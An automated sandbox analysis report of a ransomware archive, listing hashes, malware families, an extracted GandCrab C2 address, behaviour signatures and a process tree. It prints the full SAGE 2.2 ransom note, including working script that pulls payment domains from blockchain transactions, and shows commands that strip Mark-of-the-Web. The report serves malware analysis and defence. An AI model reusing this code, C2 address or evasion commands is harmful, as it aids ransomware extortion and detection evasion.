Overview

overview

10

Static

static

1

RNSM00377.7z

windows10-2004-x64

10

Analysis

  • max time kernel
    128s
  • max time network
    288s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-11-2024 18:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00377.7z

  • Size

    16.4MB

  • MD5

    3036a2d60fca75e5a9137209302db0f7

  • SHA1

    c637e15d2abeec08980220b12fe9b708b4cca793

  • SHA256

    2cc82038dbc33c8c899c8338e6276c7965ff912138e273b43ef284fc4962ecc8

  • SHA512

    5888bcdb51acf5827a2fccb2ac6d4cde889622313f21939a8924d1f14697b4f30de2f1c0f8c4a126fe11ec08abddeb53f3f05a517441015a8821d9237fa5bb57

  • SSDEEP

    393216:gkkTgvXcda3YSqWcxJIASHJqtfWRdY5iOcecsuSRc:gDkXc8fqTxKAwJqteRC4dnUa

Score
10/10
agenttesladharmagandcrabbackdoorcredential_accessdefense_evasiondiscoveryevasionexecutionimpactkeyloggerpersistenceransomwarespywarestealertrojanupx

Malware Config

Extracted

Family

gandcrab

C2

http://gdcbghvjyqy7jclk.onion.top/

Extracted

Path

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.2.705\resources\easylist\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AQAAAAAAAAAAoMZ7QA5z0UbD9BZS1pVdSq98gFPmyPpW7hLl2CARLVvA" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Agenttesla family
    agenttesla
  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

    ransomwaredharma
  • Dharma family
    dharma
  • GandCrab payload 3 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Gandcrab family
    gandcrab
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • AgentTesla payload 1 IoCs
  • Contacts a large (7753) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Renames multiple (264) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (276) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Downloads MZ/PE file
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Drops startup file 16 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 11 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 9 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 32 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 6 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    1⤵
      PID:2440
    • C:\Windows\system32\sihost.exe
      sihost.exe
      1⤵
      • Modifies registry class
      PID:2448
    • C:\Windows\system32\taskhostw.exe
      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
      1⤵
        PID:2624
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of UnmapMainImage
        PID:3460
        • C:\Program Files\7-Zip\7zFM.exe
          "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00377.7z"
          2⤵
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1356
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /4
          2⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Windows\system32\taskmgr.exe
            "C:\Windows\system32\taskmgr.exe" /1
            3⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:4444
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /1
              4⤵
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2156
              • C:\Windows\system32\taskmgr.exe
                "C:\Windows\system32\taskmgr.exe" /1
                5⤵
                • Suspicious use of NtCreateProcessExOtherParentProcess
                • Drops startup file
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                PID:4616
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3176
          • C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            3⤵
              PID:2372
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3652
              • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.MSIL.Blocker.gen-13dd892746ffb4ad28fdd6443b16d7b4158a5bd441ac2e9b6e8184cf863f4bd0.exe
                HEUR-Trojan-Ransom.MSIL.Blocker.gen-13dd892746ffb4ad28fdd6443b16d7b4158a5bd441ac2e9b6e8184cf863f4bd0.exe
                4⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:5112
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Blocker.gen-13dd892746ffb4ad28fdd6443b16d7b4158a5bd441ac2e9b6e8184cf863f4bd0.exe:Zone.Identifier"
                  5⤵
                  • Subvert Trust Controls: Mark-of-the-Web Bypass
                  • System Location Discovery: System Language Discovery
                  • NTFS ADS
                  PID:9112
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    6⤵
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious use of SetWindowsHookEx
                    PID:9816
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c copy "HEUR-Trojan-Ransom.MSIL.Blocker.gen-13dd892746ffb4ad28fdd6443b16d7b4158a5bd441ac2e9b6e8184cf863f4bd0.exe" "C:\Users\Admin\AppData\Roaming\filename1.exe"
                  5⤵
                    PID:13516
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\AppData\Roaming\filename1.exe"
                    5⤵
                      PID:9596
                      • C:\Users\Admin\AppData\Roaming\filename1.exe
                        "C:\Users\Admin\AppData\Roaming\filename1.exe"
                        6⤵
                          PID:6044
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Admin\AppData\Roaming\filename1.exe:Zone.Identifier"
                            7⤵
                              PID:6632
                            • C:\Users\Admin\AppData\Roaming\filename1.exe
                              C:\Users\Admin\AppData\Roaming\filename1.exe
                              7⤵
                                PID:8812
                        • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Blocker.vho-b69caaef596715a5ead5aac8af29f95d18454eef8081f3931fa7e9d3663a0c19.exe
                          HEUR-Trojan-Ransom.Win32.Blocker.vho-b69caaef596715a5ead5aac8af29f95d18454eef8081f3931fa7e9d3663a0c19.exe
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2080
                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                            HEUR-Trojan-Ransom.Win32.Blocker.vho-b69caaef596715a5ead5aac8af29f95d18454eef8081f3931fa7e9d3663a0c19.exe
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:9772
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              6⤵
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of SetWindowsHookEx
                              PID:8212
                        • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Encoder.gen-39deb2f02fee04a430cff446b35b0984a66b563552775eb1309d35acca3a209f.exe
                          HEUR-Trojan-Ransom.Win32.Encoder.gen-39deb2f02fee04a430cff446b35b0984a66b563552775eb1309d35acca3a209f.exe
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:3664
                          • C:\Users\Admin\AppData\Local\Temp\y_installer.exe
                            C:\Users\Admin\AppData\Local\Temp\y_installer.exe --partner 351634 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"
                            5⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:6604
